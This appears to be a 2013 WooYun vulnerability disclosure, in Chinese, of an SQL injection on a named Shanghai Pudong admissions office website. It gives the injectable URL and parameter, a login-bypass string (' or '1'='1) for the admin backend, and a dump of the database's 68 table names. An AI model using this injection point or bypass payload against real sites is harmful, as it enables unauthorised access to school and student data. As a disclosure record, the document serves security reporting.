漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:某招生办网站SQL注入漏洞
提交时间:2013-08-21 12:20
修复时间:2013-10-05 12:20
公开时间:2013-10-05 12:20
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情 披露状态:
2013-08-21: 细节已通知厂商并且等待厂商处理中 2013-08-26: 厂商已经确认,细节仅向厂商公开 2013-09-05: 细节向核心白帽子及相关领域专家公开 2013-09-15: 细节向普通白帽子公开 2013-09-25: 细节向实习白帽子公开 2013-10-05: 细节向公众公开
简要描述: SQL注入~
详细说明: 注入点:http://www.zsb.pudong-edu.sh.cn/CenterWeb/xjgl/index.asp?SearchValue=%27&LmID=74&submit=%CB%D1%CB%F7 参数:SearchValue PS:后台登录处也有问题,用户名' or '1'='1,密码随意即可进入
漏洞证明:
Database: zhaoshengban [68 tables] +------------------------+ | AboutResult | | BForum | | BManager | | BReply | | BTeam | | BTopic | | CWIS_FunIndex | | CWIS_InformationMore | | CWIS_InformationReturn | | CWIS_LM | | CWIS_Logs | | CWIS_SchoolBaseInfo | | CWIS_Style | | CenterBigMode | | CenterMiddleMode | | CenterSubMode | | Classes | | Department | | Educate | | EducateType | | FForum | | FManager | | FReply | | FTeam | | FTopic | | FamousTeacher | | FamousTeacherArticle | | FileGroups | | Files | | GongGao | | GradeTable | | Grades | | GuestBook | | InformationClass | | InformationMore | | InformationReturn | | InformationSub | | Investigation | | Investigation2 | | Leader | | LmManage | | MessagePut | | ModelInfo | | News | | NewsPicture | | NewsType | | Notice | | NoticeReciever | | Noticetype | | NotifyReciever | | NotifyReplay | | Notifys | | PageInfo | | Party | | PartyType | | PermissionGroup | | PublicList | | PublicList_Notify_Log | | bmlogin | | bmtjdm | | dj | | dm_course_z | | dm_session_z | | dtproperties | | edu | | edutype | | jg_js_z | | njdm | +------------------------+
后台:
修复方案: 版权声明:转载请注明来源 c2c2 @乌云
漏洞回应 厂商回应: 危害等级:中
漏洞Rank:10
确认时间:2013-08-26 00:06
厂商回复:
最新状态: 暂无